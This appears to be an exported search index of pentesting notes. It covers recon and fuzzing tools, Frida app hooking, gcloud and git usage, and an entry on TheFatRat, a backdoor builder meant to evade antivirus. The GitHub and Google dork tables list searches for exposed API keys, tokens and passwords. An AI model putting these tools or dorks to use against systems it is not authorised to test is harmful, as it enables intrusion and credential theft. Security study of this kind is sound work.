The exiftool output can be organized based on these groups using the\u00a0-g\u00a0or\u00a0-G\u00a0option (ie.\u00a0-g1\u00a0to see family 1 groups, or\u00a0-g3:1\u00a0to see both family 3 and family 1 group names in the output). See the\u00a0-g\u00a0option in the exiftool application documentation for more details, and the\u00a0GetGroup\u00a0function in the ExifTool library for a description of the group families. Note that when writing, only family 0, 1, 2 and 7 group names may be used.
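For instance, to print the family 1 group name next to every extracted tag (the image name is illustrative; -a allows duplicate tags):

exiftool -a -G1 image.jpg\n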

                        ","tags":["pentesting","file"]},{"location":"eyewitness/","title":"EyeWitness","text":"

EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if known. It is designed to run on Kali Linux.

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#installation","title":"Installation","text":"

                        Download from: https://github.com/FortyNorthSecurity/EyeWitness.

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#basic-usage","title":"Basic usage","text":"

                        First, create a file with the target domains, like for instance, listOfdomains.txt.

                        Then, run:

                        eyewitness --web -f listOfdomains.txt -d path/to/save/\n

After that you will get a report.html file with the requests and screenshots of those domains. You will also have the index.html source code and the libraries in use.

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#proxing-the-request-via-burpsuite","title":"Proxing the request via BurpSuite","text":"
                        eyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"fatrat/","title":"FatRat","text":"

TheFatRat\u00a0is an exploitation tool which compiles malware with a famous payload; the compiled malware can then be executed on Linux, Windows, Mac and Android.\u00a0TheFatRat\u00a0provides an easy way to create backdoors and payloads which can bypass most antivirus software.

                        "},{"location":"fatrat/#installation","title":"Installation","text":"
                        git clone https://github.com/screetsec/TheFatRat.git\ncd TheFatRat\nchmod +x fatrat setup.sh\nsudo ./setup.sh\n
                        "},{"location":"fatrat/#basic-usage","title":"Basic usage","text":"
                        # After launching it, browse the menu that fatrat has\ncd TheFatRat\nsudo fatrat\n
                        "},{"location":"feroxbuster/","title":"feroxbuster - A web content enumeration tool for not referenced resources","text":"

                        feroxbuster is used to perform forced browsing. Forced browsing allows us to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.

                        Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories.

                        ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#installation","title":"Installation","text":"

                        See the repo: https://github.com/epi052/feroxbuster.

                        sudo apt update && sudo apt install -y feroxbuster\n
                        ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#dictionaries","title":"Dictionaries","text":"

Path to the default configuration file (where the default wordlist is set): /etc/feroxbuster/ferox-config.toml
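To override the configured wordlist for a single run (the wordlist path is illustrative):

feroxbuster -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt\n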

                        ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#basic-commands","title":"Basic commands","text":"
                        # Include headers in the request\nferoxbuster -u http://127.1 -H Accept:application/json \"Authorization: Bearer {token}\"\n\n# Read urls from STDIN; pipe only resulting urls out to another tool\ncat targets | feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy traffic through Burp\nferoxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\n\n# Proxy traffic through a SOCKS proxy (including DNS lookups)\nferoxbuster -u http://127.1 --proxy socks5h://127.0.0.1:9050\n\n# Pass auth token via query parameter\nferoxbuster -u http://127.1 --query token=0123456789ABCDEF\n
                        ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"ffuf/","title":"ffuf - A fast web fuzzer written in Go","text":"","tags":["pentesting","web pentesting","enumeration"]},{"location":"ffuf/#installation","title":"Installation","text":"

                        Download from: https://github.com/ffuf/ffuf

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"ffuf/#basic-commands","title":"Basic commands","text":"
                        ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n####### Matchers options #######\n# -mc: Match HTTP status codes, or \"all\" for everything. (default: 200,204,301,302,307,401,403,405)\n# -ml: Match amount of lines in response\n# -mr: Match regexp\n# -ms: Match HTTP response size\n# -mw: Match amount of words in response\n\n####### Filters options #######\n# -fc: Filter HTTP status codes from response. Comma separated list of codes and ranges\n# -fl: Filter by amount of lines in response. Comma separated list of line counts and ranges\n# -fr: Filter regexp\n# -fs: Filter HTTP response size. Comma separated list of sizes and ranges\n# -fw: Filter by amount of words in response. Comma separated list of word counts and ranges\n\n# Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\nffuf -w /path/to/vhost/wordlist -u https://$ip -H \"Host: FUZZ\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.example.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n

                        By pressing ENTER during ffuf execution, the process is paused and the user is dropped into a shell-like interactive mode: there, filters can be reconfigured, the request queue managed, and the current state saved to disk.

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"fierce/","title":"fierce - DNS scanner that helps locate non-contiguous IP space and hostnames","text":"

                        Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. It's really meant as a precursor to nmap, OpenVAS, nikto, etc., since all of those require that you already know what IP space you are looking for. This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network. Because it uses DNS primarily, you will often find misconfigured networks that leak internal address space. Originally written by RSnake along with others at http://ha.ckers.org/.

                        # Attempt a DNS zone transfer and subdomain brute force against domain.com (legacy syntax)\nfierce -dns domain.com \n\n# Brute force subdomains with a wordlist (current syntax)\nfierce --domain domain.com --subdomain-file fierce-hostlist.txt\n
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"figlet/","title":"Figlet","text":"","tags":["tools"]},{"location":"figlet/#installation","title":"Installation","text":"
                        sudo apt install figlet\n
                        ","tags":["tools"]},{"location":"figlet/#basic-commands","title":"Basic commands","text":"
                        # Show all fonts\nshowfigfonts\n\n# Usage\nfiglet -f banner \"lalala\"\n# -f font\n# banner is just a font\n# \"lalala\" the text that will be displayed\n\n\n#                                          \n#         ##   #        ##   #        ##   \n#        #  #  #       #  #  #       #  #  \n#       #    # #      #    # #      #    # \n#       ###### #      ###### #      ###### \n#       #    # #      #    # #      #    # \n####### #    # ###### #    # ###### #    # \n
                        ","tags":["tools"]},{"location":"file-encryption/","title":"File encryption","text":"


                        "},{"location":"file-encryption/#file-encryption","title":"File Encryption","text":""},{"location":"file-encryption/#windows","title":"Windows","text":""},{"location":"file-encryption/#invoke-aesencryptionps1-powershell-script","title":"Invoke-AESEncryption.ps1 PowerShell script","text":"

                        Invoke-AESEncryption.ps1 PowerShell script

                        After the script has been transferred, it only needs to be imported as a module, as shown below.

                        PS C:\\htb> Import-Module .\\Invoke-AESEncryption.ps1\n

                        Encrypting a file creates a new file with the same name as the source file but with the extension \".aes\" appended. Cheat sheet for encrypting and decrypting files:

                        ############\n# ENCRYPTION\n############\n# Encrypts the string \"Secret Text\" and outputs a Base64 encoded ciphertext\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Text \"Secret Text\" \n\n# Encrypts the file \"file.bin\" and outputs an encrypted file \"file.bin.aes\"\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Path file.bin\n\n# Decrypts the file \"file.bin.aes\" and outputs the decrypted file \"file.bin\"\nInvoke-AESEncryption -Mode Decrypt -Key \"p@ssw0rd\" -Path file.bin.aes\n
                        ############\n# DECRYPTION\n############\n# Decrypts the Base64 encoded string \"LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=\" and outputs plain text.\nInvoke-AESEncryption -Mode Decrypt -Key \"p@ssw0rd\" -Text \"LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=\"\n
                        "},{"location":"file-encryption/#linux","title":"Linux","text":"

                        See openssl

                        # Encrypt a file\nopenssl enc -aes-256-cbc -iter 100000 -pbkdf2 -in sourceFile.txt -out outputFile.txt.enc\n# -iter 100000: Optional. Override the default iterations counts with this option.\n# -pbkdf2: Optional. Use the Password-Based Key Derivation Function 2 algorithm.\n\n# Decrypt a file\nopenssl enc -d -aes-256-cbc -iter 100000 -pbkdf2 -in encryptedFile.enc -out outputFile.txt\n\n# Generate private key\nopenssl genrsa -aes256 -out private.pem 2048\n\n# Generate public key\nopenssl rsa -in private.pem -outform PEM -pubout -out public.pem\n\n# Encrypt a file with public key\nopenssl rsautl -encrypt -inkey public.pem -pubin -in file.txt -out file.enc\n# -pubin: the input key is a public key\n\n# Decrypt a file with private key\nopenssl rsautl -decrypt -inkey private.pem -in file.enc -out file.txt\n
                        "},{"location":"footprinting/","title":"01. Information Gathering / Footprinting","text":"","tags":["footprinting","CPTS","eWPT"]},{"location":"footprinting/#methodology","title":"Methodology","text":"Layer Description Information Categories 1. Internet Presence Identification of internet presence and externally accessible infrastructure. Domains, Subdomains, vHosts, ASN, Netblocks, IP Addresses, Cloud Instances, Security Measures 2. Gateway Identify the possible security measures to protect the company's external and internal infrastructure. Firewalls, DMZ, IPS/IDS, EDR, Proxies, NAC, Network Segmentation, VPN, Cloudflare 3. Accessible Services Identify accessible interfaces and services that are hosted externally or internally. Service Type, Functionality, Configuration, Port, Version, Interface 4. Processes Identify the internal processes, sources, and destinations associated with the services. PID, Processed Data, Tasks, Source, Destination 5. Privileges Identification of the internal permissions and privileges to the accessible services. Groups, Users, Permissions, Restrictions, Environment 6. OS Setup Identification of the internal components and systems setup. OS Type, Patch Level, Network config, OS Environment, Configuration files, sensitive private files","tags":["footprinting","CPTS","eWPT"]},{"location":"footprinting/#owasp-reference","title":"OWASP reference","text":"ID WSTG-ID Test Name Objectives Tools 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services). Google Hacking Shodan Recon-ng 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities. Wappalyzer Nikto 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand. Browser Curl Burpsuite/ZAP 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers dnsrecon Nmap 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist. Browser Curl Burpsuite/ZAP 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis OWASP ASD Burpsuite/ZAP 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough Burpsuite/ZAP 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. 
- Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message. Whatweb Wappalyzer CMSMap 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08 NA 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs Network and Security: Reverse proxy, IPS, WAF WAFW00F Nmap","tags":["footprinting","CPTS","eWPT"]},{"location":"fping/","title":"fping - An improved ping tool","text":"

                        Linux tool which is an improved version of the ping utility:

                        fping -a -g IPRANGE\n# -a: forces the tool to show only alive hosts.\n# -g: tells the tool we want to perform a ping sweep instead of a standard ping.\n

                        You can also use CIDR notation, or specify the range by its first and last address:

                        fping -a -g 10.54.12.0/24\nfping -a -g 10.54.12.0 10.54.12.255\n
                        ","tags":["scanning","reconnaissance","ping"]},{"location":"frida/","title":"Frida - A dynamic instrumentation toolkit","text":"

                        Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. It lets you inject snippets of JavaScript or your own library into native apps on Windows, macOS, GNU/Linux, iOS, watchOS, tvOS, Android, FreeBSD, and QNX. Frida also provides you with some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API. More.

                        ","tags":["mobile pentesting"]},{"location":"frida/#installation-and-set-up","title":"Installation and set up","text":"

                        Download it:

                        pip install frida-tools\npip install frida\nwget https://github.com/frida/frida/releases/download/15.1.14/frida-server-15.1.14-android-x86.xz\n

                        Unzip the file with extension xz:

                        unxz frida-server-15.1.14-android-x86.xz\n

                        Make sure we're connected to the device:

                        adb connect 192.168.156.103:5555\n

                        Upload frida file to the device:

                        adb push frida-server-15.1.14-android-x86 /data/local/tmp/frida-server\n

                        We go to the path where we have stored the file:

                        adb shell\ncd /data/local/tmp\n

                        We list contents, see frida-server file, and we change permissions:

                        ls -la\nchmod 777 frida-server\n

                        Now we can run the binary:

                        ./frida-server\n

                        From another terminal we can see processes running on the device:

                        frida-ps -U\n
                        ","tags":["mobile pentesting"]},{"location":"frida/#install-burp-certificate-in-frida","title":"Install Burp Certificate in Frida","text":"

                        Our goal is to install it at /system/etc/security/cacerts. This is where the Certificate Authority certificates are stored, and it's the place where we will install the Burp certificate.

                        First, we open Burp > Proxy > Options > Proxy Listener and we click on \"Import / Export CA Certificate\". We save it in DER format to a folder accessible from kali. We can give it the name: cacert.der.

                        Second, we convert der format to pem:

                        openssl x509 -inform DER -in cacert.der -out cacert.pem\n

                        Now, we extract the hash that we will use later on to name the certificate.

                        openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1\n

                        It returns (for instance): 9a5ba575.

                        Let's rename cacert.pem to that hash value:

                        mv cacert.pem 9a5ba575.0\n

                        To act as root we'll run:

                        adb root\n

                        And to mount again the units:

                        adb remount\n

                        Next step is to upload the certificate 9a5ba575.0 to the SD card:

                        adb push 9a5ba575.0 /sdcard/\n

                        Let's go to that directory and move the file to our preferred location:

                        adb shell\ncd /sdcard\nls -la\nmv 9a5ba575.0 /system/etc/security/cacerts\n

                        Change permissions to the file:

                        chmod 644 /system/etc/security/cacerts/9a5ba575.0\n

                        Now, in Burp, we need a Proxy Listener bound to the Host-Only IP of our Kali machine (for instance 192.168.156.107), port 8080.

                        And in the wifi settings of the virtual device running on Genymotion (for instance a Galaxy S6), we need to point the proxy to that same Host-Only IP of our Kali.
                        ","tags":["mobile pentesting"]},{"location":"frida/#basic-commands","title":"Basic commands","text":"
                        # Display active processes and installed applications\nfrida-ps -Ua\n\n\n# Restore class loaders\nJava.perform(function() {\n    var application = Java.use(\"android.com.application\");\n    var classloader;\n    application.attach.overload('android.content.Context').implementation = function(context) {\n        var result = this.attach(context);\n        classloader = context.getClassLoader();\n        Java.classFactory.loader = classloader;\n    return result;\n    }\n})\n\n# Enumerate classes loaded in memory\nJava.perform(function() {\n    Java.enumerateLoadedClasses\n    ({\n        \"onMatch\": function(className) {\n            console.log(className)\n            },\n        \"onComplete\": function(){}\n    })\n})\n\n# Enumerate classes loaded in memory linked to a specific <package>\nJava.enumerateLoadedClasses\n({\n    \"onMatch\": function(className) {\n        if(className.includes(\"<package>\")) {\n            console.log(className);\n        }\n    },\n    \"onComplete\": function(){}\n});\n\n# Android version installed on device\nJava.androidVersion\n\n# Execute a method of an Activity\nJava.choose(\"<Name and path of the activity>\", {\n    onMatch: function(instance) {\n        // Called for every instance found by Frida\n        console.log(\"Found instance: \" + instance);\n        instance.<Method name>();\n    },\n    onComplete: function(){}\n});\n\n# Save an Activity in a variable\nvar NameofVariable = Java.use(\"com.android.application.<nameOfActivity>\"); \n\n# Execute a script js from Frida\nfrida -U com.android.applicationName -l instance.js\n\n# Modify the implementation of a function\nvar activity = Java.use(\"com.droidhem.basketball.adapters.Game\");\nactivity.normalshoot.implementation = function(x,y){\n    // Print a marker and bump the score\n    console.log(\"Inside normalshoot\");\n    this.score.value += 10000;\n    // in the original code:\n    // this.score += 2;\n}\n
                        ","tags":["mobile pentesting"]},{"location":"gcloud-cli/","title":"gcloud CLI","text":"
                        # Get a list of images \ngcloud compute images list \n\n\n# PROJECT=<PROJECT> # Replace this with your project id \n# ZONE=<zone>   # Replace this with a GCP zone of your choice \n\n# Launch a GCE instance \ngcloud compute instances create gcp-lab1 \\ \n --project=$PROJECT \\ \n --zone=$ZONE \\ \n --machine-type=f1-micro \\ \n --tags=http-server \\ \n --image=ubuntu-1804-bionic-v20190722a \\ \n --image-project=ubuntu-os-cloud \n\n# Get a list of instances\ngcloud compute instances list\n\n# Filter instances by zone \ngcloud compute instances list --zone=<zone>\n\n\n\n# SSH into the VM. This command creates the pair of keys and all ssh infrastructure needed for the connection\ngcloud compute ssh <instance> --zone=<zone-of-instance> \n\n\n# Open port 80 for HTTP access \ngcloud compute firewall-rules create default-allow-http \\ \n --project=$PROJECT \\ \n --direction=INGRESS \\ \n --action=ALLOW \\ \n --rules=tcp:80 \\ \n --source-ranges=0.0.0.0/0 \\ \n --target-tags=http-server \n\n\n# Run these commands within the VM \nsudo apt-get install -y apache2 \nsudo systemctl start apache2 \n\n\n# Access Apache through the public IP \n# Terminate the instance \ngcloud compute instances delete gcp-lab1 --zone $ZONE \n\n\n# Connect to Google Cloud SQL\ngcloud sql connect <nameOfDatabase>\n

                        Add an image to GCP Container Registry

                        In GCP Dashboard, go to Container Registry. The first time, it will be empty.

                        # Run the below commands in Google Cloud Shell \n\ngcloud services enable containerregistry.googleapis.com \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP Project ID \n\ndocker pull busybox \ndocker images \n
                        cat <<EOF >>Dockerfile \nfrom busybox:latest \nCMD [\"date\"] \nEOF \n
                        # Build your own instance of busybox and name it mybusybox\ndocker build . -t mybusybox \n\n# Tag your image with the convention stated by GCP\ndocker tag mybusybox gcr.io/$PROJECT_ID/mybusybox:latest \n# When listing images with docker images, you will see it renamed.\n\n# Run your image\ndocker run gcr.io/$PROJECT_ID/mybusybox:latest \n
                        # Associate gcp credentials with docker CLI  \ngcloud auth configure-docker \n\n# Take our mybusybox image available in the environment and pushes it to the Container Registry.\ndocker push gcr.io/$PROJECT_ID/mybusybox:latest \n
                        ","tags":["cloud","google cloud platform","gcp"]},{"location":"gcloud-cli/#demo-of-anthos","title":"Demo of Anthos","text":"
                        # Run the below commands in the macOS Terminal \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP project ID \nexport REGION=<REGION ID> # Replace this with a valid GCP region \n\ngcloud config set project $PROJECT_ID \ngcloud config set compute/region $REGION \n\n# Enable APIs \ngcloud services enable \\ \n container.googleapis.com \\ \n gkeconnect.googleapis.com \\ \n gkehub.googleapis.com \\ \n cloudresourcemanager.googleapis.com \n\n# Launch GKE Cluster \ngcloud container clusters create cloud-cluster \\ \n    --machine-type=n1-standard-1 \\ \n    --num-nodes=1 \n\n# Launch Minikube. Refer to the docs at https://minikube.sigs.k8s.io/docs/  \nminikube start \n\n# Create GCP Service Account \ngcloud iam service-accounts create anthos-hub \n\n# Add IAM Role to Service Account \ngcloud projects add-iam-policy-binding $PROJECT_ID \\ \n --member=\"serviceAccount:anthos-hub@$PROJECT_ID.iam.gserviceaccount.com\" \\ \n --role=\"roles/gkehub.connect\" \n\n# Download the Service Account JSON Key \ngcloud iam service-accounts keys create \"./anthos-hub-svc.json\" \\ \n  --iam-account=\"anthos-hub@$PROJECT_ID.iam.gserviceaccount.com\" \\ \n  --project=$PROJECT_ID \n\n# Register cluster with Anthos \nURI='gcloud container clusters list --filter='name=cloud-cluster' --uri'\n\ngcloud container hub memberships register cloud-cluster \\ \n        --gke-uri=$URI \\ \n        --service-account-key-file=./anthos-hub-svc.json \n\n# List Membership \ngcloud container hub memberships list \n\n# Register Minikube with Anthos \ngcloud container hub memberships register local-cluster \\ \n --service-account-key-file=./anthos-hub-svc.json \\ \n --kubeconfig=~/.kube/config \\ \n --context=minikube \n\n# List Membership \ngcloud container hub memberships list \n\n# Create Kubernetes Role \n\nkubectl config use-context minikube \n
                        cat <<EOF > cloud-console-reader.yaml \nkind: ClusterRole \napiVersion: rbac.authorization.k8s.io/v1 \nmetadata: \n  name: cloud-console-reader \nrules: \n- apiGroups: [\"\"] \n  resources: [\"nodes\", \"persistentvolumes\"] \n  verbs: [\"get\", \"list\", \"watch\"] \n- apiGroups: [\"storage.k8s.io\"] \n  resources: [\"storageclasses\"] \n  verbs: [\"get\", \"list\", \"watch\"] \nEOF \n
                        kubectl apply -f cloud-console-reader.yaml \n\n# Create RoleBinding \nkubectl create serviceaccount local-cluster \n\nkubectl create clusterrolebinding local-cluster-anthos-view \\ \n --clusterrole view \\ \n --serviceaccount default:local-cluster \n\nkubectl create clusterrolebinding cloud-console-reader-binding \\ \n --clusterrole cloud-console-reader \\ \n --serviceaccount default:local-cluster \n\n# Get the Token \nSECRET_NAME=$(kubectl get serviceaccount local-cluster -o jsonpath='{$.secrets[0].name}') \n\n# Copy the secret and paste it in the console \nkubectl get secret ${SECRET_NAME} -o jsonpath='{$.data.token}' | base64 --decode  \n\n# Delete Membership \ngcloud container hub memberships delete cloud-cluster \ngcloud container hub memberships delete local-cluster \n\n# Clean up  \ngcloud container clusters delete cloud-cluster --project=${PROJECT_ID} \ngcloud iam service-accounts delete anthos-hub@${PROJECT_ID}.iam.gserviceaccount.com \nminikube delete \n
                        ","tags":["cloud","google cloud platform","gcp"]},{"location":"git/","title":"Git - A version controller system for programming","text":"

                        Git is\u00a0 a distributed version control system that tracks changes in any set of computer files, usually used for coordinating work among programmers wikipedia

                        "},{"location":"git/#install","title":"Install","text":"

                        From: https://git-scm.com/

                        "},{"location":"git/#git-basic-commands","title":"Git basic commands","text":"

                        Go to your project folder and then initialize a repo with

                        git init\n

                        Once you do that, you will see a .git folder in your project folder.

                        "},{"location":"git/#git-status","title":"git status","text":"

                        This tells you what is not yet saved in the repository. These are the \"untracked\" files.

                        git status\n
                        "},{"location":"git/#git-add","title":"git add","text":"

                        \"Git add\" add changed files/folders to the repository staging area of the branch. It tracks them. You can add a single file with:

                        git add <file>\n

                        You can also add a folder

                        git add <folder>\n
                        You can add all unstaged files with a dot:

                        git add .\n
                        "},{"location":"git/#git-rm-cached","title":"git rm --cached","text":"

                        You can unstage files from being committed:

                        git rm --cached <file>\n
                        "},{"location":"git/#git-commit","title":"git commit","text":"

                        Commit the changes you have staged properly with:

                        git commit -m \"message that describes what you have changed\"\n

                        To undo the most recent commit we've made:

                        git reset --soft HEAD~\n
                        "},{"location":"git/#git-config","title":"git config","text":"

                        To setup user name and user email:

                        git config --global user.name \"NameOfUser\"\ngit config --global user.email \"email@email.com\"\n
                        "},{"location":"git/#git-branch","title":"git branch","text":"

                        To create a new branch:

                        git branch <newBranchName>\n

                        To list all existing branches:

                        git branch\n

                        To switch to a branch:

                        git checkout <destinationBranch>\n

                        To create a new branch and checkout into it in one command:

                        git checkout -b <branchName>\n
                        To delete a branch:

                        git branch <branchName> -d\n

                        If you want to force the deletion (maybe some changes are not staged), then:

                        git branch <branchName> -D\n
                        "},{"location":"git/#git-merge","title":"git merge","text":"

                        Having two branches (main and newbranch), to merge changes contained in newbranch to main branch, go to main branch with \"git checkout main\" and merge the new branch with:

                        git merge <newBranch>\n
                        "},{"location":"git/#git-log","title":"git log","text":"

                        It displays all commits and their commit messages. Every commit has an associated id. You can use that id to revert changes.

                        git log\n
                        "},{"location":"git/#git-revert","title":"git revert","text":"

                        It allows us to revert back to a previous version of our project.

                        git revert <commitId>\n
                        "},{"location":"git/#gitignore","title":".gitignore","text":"

                        It's a configuration file that tells git which existing files and folders in your repository should not be tracked. Content listed there doesn't get pushed to a public repository. The file is called .gitignore and has one line per resource to be ignored, as in the sketch below.
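
                        A minimal .gitignore sketch (the entries are hypothetical examples):

                        node_modules/\n*.log\n.env\n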

                        Also important: if a file was already staged, you will need to remove it from the cache first...

                        "},{"location":"git/#git-remove-cached","title":"git remove --cached","text":"

                        To remove from cached files and include it later into the .gitignore file list.

                        git remove --cache <fileName>\n
                        "},{"location":"git/#git-remote","title":"git remote","text":"

                        To check out which remote repository our local repository is connected to:

                        git remote\n

                        To connect your local project folder to the GitHub repo:

                        git remote add origin https://github.com/username/reponame.git\n
                        "},{"location":"git/#git-push","title":"git push","text":"

                        To push our local changes into the connected github repo:

                        git push -u origin main\n
                        Note: origin references the connection, and main is because we are in the main branch (that's what we are pushing). The first git push is a little different from future git pushes, since we'll need to use the -u flag in order to set origin as the default remote repository, so we won't have to provide its name every time.

                        "},{"location":"git/#some-tricks","title":"Some tricks","text":""},{"location":"git/#counting-commits","title":"Counting commits","text":"

                        git rev-list --count HEAD\n
                        If you want to specify a branch name:
                        git rev-list --count <branch>\n

                        "},{"location":"git/#backing-up-untracked-files","title":"Backing-up untracked files","text":"

                        Git, along with some Bash command piping, makes it easy to create a tar archive of your untracked files.

                        $ git ls-files --others --exclude-standard -z |\\\nxargs -0 tar rvf ~/backup-untracked.tar\n

                        "},{"location":"git/#viewing-a-file-of-another-branch","title":"Viewing a file of another branch","text":"

                        Sometimes you want to view the content of the file from another branch. It's possible with a simple Git command, and without actually switching your branch.

                        Suppose you have a file called README.md in the main branch, and you're working on a branch called dev. You can view the main version with git show main:README.md. The general form is:

                        git show <branchName>:<fileName>\n

                        "},{"location":"git/#pentesting-git","title":"Pentesting git","text":"

                        Source: https://thecyberpunker.com/tools/git-exposed-pentesting-git-tools/

                        "},{"location":"git/#git-dumper","title":"git-dumper","text":"

                        https://github.com/arthaud/git-dumper
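
                        Typical usage (the target URL and output directory below are placeholders): it downloads an exposed .git directory and reconstructs the repository locally:

                        git-dumper http://example.com/.git ./website-dump\n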

                        "},{"location":"github-dorks/","title":"Github Dorks","text":"

                        Go to GitHub and try the following search queries.

                        | Github Dorking Query | Expected results |
                        | --- | --- |
                        | applicationName api key | After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo. Other terms to try: api_key, authorization_bearer, oauth, auth, authentication, client_secret, api_token, client_id, OTP, HOMEBREW_GITHUB_API_TOKEN, SF_USERNAME, HEROKU_API_KEY, JEKYLL_GITHUB_TOKEN, api.forecast.io, password, user_password, user_pass, passcode, client_secret, secret, password hash, user auth |
                        | extension: json nasa | Results show some extensions that include json, so they might be API related. |
                        | shodan_api_key | Results show shodan api keys. |
                        | \"authorization: Bearer\" | This search reveals some authorization tokens. |
                        | filename: swagger.json | Go to the Code tab and you will have the swagger file. |
                        ","tags":["reconnaissance","scanning","osint","dorking"]},{"location":"gobuster/","title":"gobuster","text":"

                        Great tool for brute-force directory discovery, but it's not recursive (you need to specify a directory to perform a deeper scan). Also, dictionaries are not API-specific. Here are some commands for Gobuster:

                        gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,404 -x .php,.txt -r \n# -b: exclude specific HTTP response codes from the results\n# -r: follow redirects\n# -x: append these extensions to each word in the dictionary\n
                        "},{"location":"gobuster/#enumerate-subdomains","title":"Enumerate subdomains:","text":"

                        From HackTheBox machine - Three:

                        gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n
                        "},{"location":"gobuster/#examples-from-real-life","title":"Examples from real life","text":"
                        gobuster dir -u https://friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,php -t 20 -k\n\n# dir to search for directories\n# -t number of concurrent threads\n# -k to avoid error message about certificate: invalid certificate: x509: certificate has expired or is not yet valid\n# -x to indicate an extension for the file\n# -w to indicate a dictionary or wordlist\n\n\n\n# -l Display the length of the response\n# -s Show an especific status code\n# -r Follow redirect\n
                        "},{"location":"google-dorks/","title":"Google Dorks","text":"

                        Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using.

                        This is an awesome database with more than 7K googledork entries: https://www.exploit-db.com/google-hacking-database.

                        | Google Dorking Query | Expected results |
                        | --- | --- |
                        | intitle:\"api\" site:\"example.com\" | Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site:\"example.com\" |
                        | intitle:\"json\" site:\"example.com\" | Many APIs use json, so this might be a cool filter. |
                        | inurl:\"/wp-json/wp/v2/users\" | Finds all publicly available WordPress API user directories. |
                        | intitle:\"index.of\" intext:\"api.txt\" | Finds publicly available API key files. |
                        | inurl:\"/api/v1\" intext:\"index of /\" | Finds potentially interesting API directories. |
